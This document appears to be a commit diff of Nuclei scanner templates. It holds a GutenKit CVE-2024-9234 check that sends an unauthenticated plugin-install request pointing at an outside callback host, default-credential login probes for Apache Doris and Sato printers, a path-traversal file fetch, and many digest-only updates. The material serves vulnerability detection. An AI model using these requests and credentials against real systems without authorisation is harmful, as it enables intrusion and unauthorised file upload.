- "{{BaseURL}}/assets/../package.json"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "name", "version", "main" ,"license")'
- 'contains(content_type, "application/octet-stream")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450221008991383bb0b49e8ed01da915dd1d19d5e78a079f4bbcba33352a2283ec85d269022047022358bc53666f8d3b2cb39f31d19b56b2063b9733c4b874d97ea531cd1f2d:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,62 @@
id: CVE-2024-9234
info:
name: GutenKit <= 2.1.0 - Arbitrary File Upload
author: s4e-io
severity: critical
description: |
The GutenKit Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-9234
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenkit-blocks-addon/gutenkit-210-unauthenticated-arbitrary-file-upload
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-9234
cwe-id: CWE-862
epss-score: 0.00045
epss-percentile: 0.16482
metadata:
verified: true
max-request: 2
vendor: wpmet
product: gutenkit
framework: wordpress
fofa-query: body="wp-content/plugins/gutenkit-blocks-addon"
tags: cve,cve2024,wordpress,wp-plugin,gutenkit,file-upload,intrusive
variables:
filename: "{{rand_text_alpha(12)}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/gutenkit-blocks-addon")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
plugin=http://{{interactsh-url}}/{{filename}}.zip
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Failed to unzip plugin", "success\":false")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502200d2daecf97ba6353e834406e14ded6bf07ae702591cd8ffd3e45f03704c1e814022100a6aa05e6e862f26d4616b870f54f60b17f263409b4642350d9919e7fd1f657ea:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,47 @@
id: doris-default-login
info:
name: Apache Doris - Default Login
author: icarot
severity: high
description: |
Tests if Apache Doris Panel, it is an easy-to-use, high performance and unified analytics database, is using the default password on root/admin user accounts.
metadata:
verified: true
max-request: 2
vendor: apache
product: doris
shodan-query: http.favicon.hash:"24048806"
fofa-query: icon_hash=24048806
tags: apache,default-login,doris
http:
- raw:
- |
POST /rest/v1/login HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{basicAuth}}
Content-Type: application/json; charset=utf-8
payloads:
basicAuth:
- YWRtaW46
- cm9vdDo=
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'msg":"Login success!"'
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a0047304502207ca61562afc68e0deef5f54d487b4eb0262b0d10a5c57e00323a18e6f475dcae022100e143d11f7871fad0101845e7f496c418fec5e786eca806f7a1ebc55b06254dc1:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,52 @@
id: sato-default-login
info:
name: Sato - Default Login
author: y0no
severity: high
description: |
Sato using default credentials was discovered.
metadata:
verified: true
max-request: 1
shodan-query: title:"Sato"
tags: sato,default-login,printer
http:
- raw:
- |
POST /WebConfig/lua/auth.lua HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}
group={{username}}&pw={{password}}
attack: pitchfork
payloads:
username:
- 'settings'
- 'service'
password:
- '0310'
- '6677'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"r":0'
- 'groups":["user'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a0047304502200f43a4032fab84d0fbda2b54a496cfc0f8f3b95d0aee80337fb770e7f55c8b4302210085ba3c0f7014df738d430c094bcbe8059b25200d4c4c08bbff3fb3a84b21579c:922c64590222798bb761d5b6d8e72950

View File

@ -2,7 +2,7 @@ id: django-admin-panel
info:
name: Python Django Admin Login Panel - Detect
author: pdteam
author: pdteam,righettod
severity: info
description: Python Django admin login panel was detected.
classification:
@ -10,21 +10,30 @@ info:
cwe-id: CWE-200
cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
metadata:
max-request: 1
max-request: 2
vendor: djangoproject
product: django
shodan-query: cpe:"cpe:2.3:a:djangoproject:django"
tags: panel,django,python,djangoproject
shodan-query: cpe:"cpe:2.3:a:djangoproject:django" || http.title:"Django administration"
tags: panel,django,python,djangoproject,login
http:
- method: GET
path:
- "{{BaseURL}}/admin/login/?next=/admin/"
- "{{BaseURL}}/admin/login/"
redirects: true
max-redirects: 2
matchers:
- type: word
words:
- "<a href=\"/admin/\">Django administration</a>"
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "| django administration", "| django-administration", "django-admin-interface", "<span>django administration</span>")'
condition: and
extractors:
- type: regex
part: body
# digest: 4a0a00473045022100ac02c54225e975d3158eb41af01a31c5140aed18e7d38914fc03d73c3f52e4f1022046df2c0f2c1ac45625152b39485a91c7dc569d88b0b24fc5349d458d836c7961:922c64590222798bb761d5b6d8e72950
group: 1
regex:
- '(?i)django-admin-interface\s+([0-9.]+)'
# digest: 4a0a00473045022100dad0f0b60ef7b6aa78556e9fb9c1bf1ec4907f613c85c08372e02e51b05e603f0220405d828d6cf6096f9069762cb2a461558f991300864e7a28792fd48e1b46421c:922c64590222798bb761d5b6d8e72950

View File

@ -29,5 +29,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a0048304602210080b8820f572c91131f10007be58ec94a50fc2508475c73d2aa603fc94d1987910221008cfac696ecc7dc9e609583d079104cd8eec2c5e16192a6b59b7ae0e6b33c1031:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100a61fdf7d73069bc7a0fc2aa7f02cef38b9ba99a5b70e7a67c86d0fe1181b2d61022100be77b644fa05b06538e76569aecbe286f632526788b99b499cb4961cab0126e3:922c64590222798bb761d5b6d8e72950

View File

@ -40,5 +40,4 @@ http:
regex:
- '<li>BucketName: (.*?)</li>'
- '<BucketName>(.*?)</BucketName>'
# digest: 4a0a00473045022100e2b821a0a6fb249dc85272f68d968364090b7078f5673a7069013a5cacf6050002206335953232c0fb1b9ae2fa35d33369a114660f8a274a81e726699fee22d07e22:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502206da7f849b4a73150729387dabea978d2cb55ac9b16a7c762d884c60b823b303a022100e135e6f16f18ea6ddf7bdfd6854219e9f52059cb5f919bef93643495475c90d1:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100e6b7ec07d8b23bcec6f83eb229c109e512d778cfd62744959800541290af47fd0221009b6f66d55555f19d4ab5e4aa3588b90dc4098fd925f7c14e546814b2ceac9161:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a0048304602210094717dd15ed0f175118448c4d2e784c52c35addc8504fc28bb1537aaea4be973022100c5125a4b2637185ab41cb53eae502954a893691e0760acd4a2bf78aa5d72e84e:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100981076247d64fe2880b96595ce27a995ab730d57c9302e67a5965a9cfefaf84202202284ebfabea85abac0f20d106f2322a63b9632bc726ec013edd0f9490507a512:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022075adb1d659404f9f128d43ea0c8294bce4740056a400b1e177d278979148fed60220557f2e5decbc3b118bccee038ed4363737b15ab14fc82b839d1ab7b381df3e91:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100d9c4678668dd66cb542d3bf7c6487b28133b63bf1c8b098a7ca4c30f85aea362022100a8dfd453696637198fe379f84e4cd6476074feb1f7f2bcafa01320484d95142c:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402205f6d979690785ef5e47256a298c3cee8f862006802d4c3da5b0a82270d2bb4430220726cac218d4fbeb5a5a6c5ec8652e04b318c0065c4cdfe3e6248e37a60f1b0d5:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022007c28522899f362462dca769ccc5025c57a0e46eb6cd5d63a8d9552816be4a9602207062046b7bd294388e115794dedb8553d0fa722ecc58e394d68d46a83ea48185:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100ae0c9bbb5345274fbc3380150b23f0f6e50d4c646a32f95e010cb54be7bb625e022070f996a582774fc8640e69964d1edb6ac445dc7cea463d25cc5aef65bad4fd81:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220786d9998ed547a8f606166df5cc9baf26e44091085692edc2b094c13604c7755022019982ea56bc228d2ede96a9e84ac3719ce654043678a22c42c1b3df2eb63c0fa:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221009f2b1c50b4c8b5998951c5ee0dd441007d4c8a18f0e9f03f3bfae407704ea0a50221008bd2b6464b241892000772f92a599dc9b9ffba60e38fb6cfc14b4a4657f9b11a:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220022ec8ad262d8efff35f06ca0b225b03b2bd4bfbc28bfcb7c4438fada26b8a1f022100e1e4a0d89cb196d62daef6fcdea0ad0cdc13173a8c0da8728d200551e9c5fb33:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100eba0ddc6ec86ec03dc4f2d17c4c2f8f0d374a14ee7a630919d11a4cb12d4898902206e325d9133fd01b1689a532842bf915185829feeae425dfc615d9e6556ec665a:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022022dc6c7ccac4a574c62e2329c089993499ef3913c8ce4fa29a438dadcc25397e022100f54e9af493d7b0244042823b8be8543123b799bed0efce635d79976cfa5c358f:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402202986217023a341c2af21bf19b197d4dcbdb0f301faa1760f021a13a06ab60c840220515ccedd23e5a9d95d1bd87cd51065ef23d6d8b054925da603dc4f7436669352:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220742c828f99e00bd48081e0428e07949b696cfa80d00c9a61ccab44c43031363b02200b96b1c9489287039173b3a2c46b28efa68ffa080ee956f49105d8d9094af84e:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220214fb9ba8efea7764f9e70940fcf5bfdd1ff382cc0279ecb3a679b175574646f022100ff0cd93c40fd23afe807c66e781d4d54ca75d65037d8f951d1855d1f98713431:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100a877ba5e1ae329008e8d45e58656ad4174994761860b47235ef51898a62af6cc02201005894091f60f306e1c1806d7bcb81a383ad1864d09c3dbf59a18e09ca9dc35:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402206872d5a395f78bfb9c47a5ffd536eb291a24dedbcd4b14162a301041b6a9a68602200b180802cfd00c3e2e991a531346e4b2065d763ba859c78441b42fe0d915b84a:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100aba2198d43f14c165a77d409a67fecd3578c7d1656319da086ea5322bfe0b70c022100c455ae9ac123ab31983294678b16b4ccee4112de241e4b17514505ec7f584991:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100f4240a053b5727160114395ddb05f4bcbc262b2d3b4fe79c8c7950715b7aca69022100b9b7bab56e4654a7c4898163f5ba20a5a8513aabd7c79c182db069a0556cb0a3:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100dc9624c529476a30f9167950a2ec1c4746604d7dc91c952c051a90d2266e3a790220211754bdcabf130391bd8ee05a0c3ee90a15cb217ef27924508ab7e19d04f626:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100e04749600bd3c33be8a381ab2ae4d656151030db1d743ba934a75613d8f0041a0221009815ae2f2f82399b8ea0932efe3a91e560eed3ad5f67c1e7c48388906836eb94:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221009f4ff8f64e65cc6ab839ac7870dec52164b53145d5c5fb0ae4fd17d360926c10022100abc61fcd1daec12a253031fb7dfb5cffdde1c0351c69a18f78ebb341e82397d9:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100b50e76d2b542d3b1f1673388ac1a396d7faf72fe6fe25b1dd83330d416c1204d022023fb0384d093878464c1d2557f890ea39c75fcba78f9f3db5b53b89bae493d53:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402201865cff9d5a0121fba9f51bec6511cef27b00502b032452be44aad5d8c96510b022022e22421978f3e35a4ec08207c2297b5fb6b5d1a6f7bdb6832288e2bd7e6a33d:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100b567084511693e7842ae6236c56ea2a8b902a6c18b57c6f35b2c3beb340573510220260cf78de5ef62aa880275754e0401edd9c84aefeedbd3aaeb1db2a19cd551ee:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402203d779ce5716597a3f5fb487cf5bb6241c3b54680aa875873602238124b705086022059dae6517bade4de1c417cd057a7dcaffb4155f5d6306bc05d60c9ec2b6e38be:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450221008a86ed764a6936805f2569e317bc1bb72583135a727278a5947c1f98470aeb31022062821ac315fda02541937a47d011204685e875837cc11bf3d10899a29393e839:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100d9c91f80a09508b3f3952b0e323f13d5160ba3c3104a5396fd0eb0f8bfbb8e910220344799ce4f28e4c133b221e5bf3a159e4e59149bc97b34361492815b3896d31c:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022056459a877cc07c0a9a082b07edb5a1bcf0ef3cfe1ad28bca058b835d381dab7302210096c9e996e248ec545b46105790dce632a4c94d91e3c0937a59bedd709ed08126:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100e0e96c2bec5cf7e24eb89b3c544afc26229a78e7a83c3138dffd29ef9fd27f0602205c9de65846d2ff3ae69618ffe1ab66424c932d57dfc6a24f78beec2aa56fb58b:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220777e6045e0d2f59244e0cf2f5ba21f5b80a10981cfb9d84a78380667e530c7da02202180a937fafad9b1f1c86a73854c3caa7987b7ae99e641149235042c30af0226:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100cf3dd0f38bf2f8cd67c5d9598f727d17dd9a2ca4c4ae86d0994f7d33e12771c6022100f002c5a9b99d9a297d9cc1e18f9bf1bc1da6880c6bf2d4bf06b7e0eab3fb8192:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220409b75ab0b84f52f78ab927ac98d0c978cf3ade73b993bb71751139657795f0302210089168221d52cd10e9847ab78c618b024bddf1606cbb0af1a58f1e2ac0e2cc06c:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100957616881d43fd1bdebfe4eedefcb0e7c3b5a86304924574b667d98f6777eaaf0220571f5343f5d5191ce4736c92a4b7bf5eb65843c15eb248d79033a1948c625293:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502201263f25d4f3a115adcc08650e830b9611890a1f6441e7e8a111018a920cd0a3402210083a180b83861eb7cdff4d43690a7ac0382438e19d1655823f5a35e3b03ed2a17:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100d7682111f63fb121797d5cd84dbc483e78436df3442b2562cbe29ede3594af0e022036ed5590bade25c41dc7549c5b701e16def457b8e96c00fa9c781c26cdad44bd:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100bf920530a83da76aacfe668aa39491795ffbe2f8b60ab4df59d23146dc3a2c3f022068a5cdbe60b43c76ecdbaa8314cd26d5c8d7b6ad317b3053251382c4c496a0f2:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100cd56936457fdcd4e261e9756f4a2155501217b35a895762e4db2d666936a3174022100b40a83106deb42c67ae5722d708291debdbc7bb2741cc62e7895d4644aafa1d1:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221008af4e7d460352200396ff420c6cd946ae943c0901201e4de58b77f67437db4bb022100d0972505851bbcad2fd2547d6413d108b7fb5ae59f9eaa65af939a3e47cea456:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022023bf31e42ac34d3310a88640a0dea9ef83806f68e0235a783fc2b3e6238b86ba022100f69ef5de8c44ec1185be5f4c153714d32b1da05c0bafbe772ce3861c59947e41:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402203c935876ef607696334ee6c919d12708e0372cd1f31eadbc8bb20f09157137af022012d06c936625b42931842101356ddcf8a20154acbc3d29f17e1be778f2da5f6d:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100f9aa4065cc369cb3dc04e360d71f695f16efb4ed39dde8e85b56afbc817c95380221009fd8213155499bcc1a826e83349e13c8bd022de1ead4e66c91b620ed0d054805:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450221009cc62293a418c997fa1a6fa8ef07676e0d3da0dcb56a43758ca1ab83d0c8bb3a022073e284760726b21b260d7deabc67060854c142a8bd1a031670918c8d72b0d5d2:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100d9af3accf06fe5dc2f6e3f42bb6f9d763fd076421854fb00d880579ebb4373610220249a48aeae178b42be4fb14ee33d16d738699d09f0c8195c5f8efa922e02cc96:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450221009bc8d823533cf00ee3218fe4e3c77dc56f98022eaa2b539f84badc47c1e5583502207c56e1b7d6c60661eebfa7e38ebc3010029b474688b2aa0a2f88454b7afb696f:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402200bdb882b6d9e2f45d11594bc4f13e0342c882da528c3256c59749ef9c2d95f6a022071d66d7d8877f95562b3a45d8388c66cd8980e2d5dd7c279e2b21f6273393d52:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402204911d909a657434a85b42a2ac848857bdf9ba47f8145288e12a1717c865ec33f0220200b18969bf7d2f54515964ed6e52868b2d8a7efe32ab54ad63d4031b1a13557:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502202e522c093ad08e95d4ca7ce9e962dc30628e9dea3330e4b57352e17712278e42022100d089ffd7c4d9630f051b298123f404f6efbc78b36ba52b6dcf86cb8e0f56a61b:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220090428b183b2c15e7fb356778a22328d0d26909f27811f3f4e17d6ac7eda5354022100e21134766075db9eef5266c6a9594a1c56d31e6f70575919f3f82742d8945495:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ea78592e11d71b16be737cee668d9b1b0fe5c43055b2e22a70c36c30fd2f0daf022100efb2c1ebad9e150ad9c316642ed49f3ef786a85d321d01034e80a458fb66b318:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402205982d6b58ad2d22630c5876e94727f08e547f923b966ea1a142f759d4bf3481602201b6eaf0c40a9a1390166b1bc644ca0b4b774f650a7452c30a65cda9cf8c88957:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100c1825a207487e75269d77e2c4c2307a7ff97d96d3aa05b0477e022bfabd21e95022100e6421c9431270cd909746325082cb5a1e81e3b18f3c2d606731b881a0fe60f49:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100c3fae8106247f5c6a7ff1f4fce7718a0c22a912af3b6f9ed5907ac2b513296a4022034e0e94ae56f7272433ec6f01030d6c8a114194c9809b60ecce7b9c9083a2f4b:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100c8ef3dcccb0af80a60ad9c1a4d42c948fbacaa2e16028164fa21093edb373d94022100ba9ce149aaea322122f1c20e52a048b4b1005f65985103a8f54ef854d6fd53f9:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ddf482d4c0bcf270dbe7eb58521dd4d63c66082d331d960da4a7e214d3049bea022100cb01741d0c0307fd3c6f822c79f6c30339bd8763adf0c70002a3b0b88fea8a73:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022029aa6760d528375ba6c216c989b1d148a1ae289d47e558fabf23925316d12685022100c7d836a1422032a428760078dbcf17bff7d95d7377bdb00f10d999719fa1857f:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220263c4f2b7f55ed06138315f58fc640f6f91f509b46e6dd535be0baf057fe17d7022039ad29b7e0ee4dc4c8ce0b7e403247dabb542c8256ed05d0864c31fd0fa195a9:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100de899adc56bdccaa0e8bef3ae21c85c4d40ea866d71ecbeb7a63f5c2737223cd022100d4de84e8c31573df323e7d1c31ea5e02835f80ada111f75754d269c22bc2ed79:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ced62d71f6c41ea7c03496d7663b1f9465439cab924b7fbbc028cfa1e7eb5ea0022100a99dcd887c842c44acc1532fe1045b89dfde60f32013fd996d8b8c8d073fc8a3:922c64590222798bb761d5b6d8e72950

View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022072539f22f4814468a89278eaf45fe3ae81b228f123fa272b9aab2086f7d5d3e6022023af95281490ece5e9080d597359a29069a3d797946532d8ace894858f62f3f4:922c64590222798bb761d5b6d8e72950

Some files were not shown because too many files have changed in this diff Show More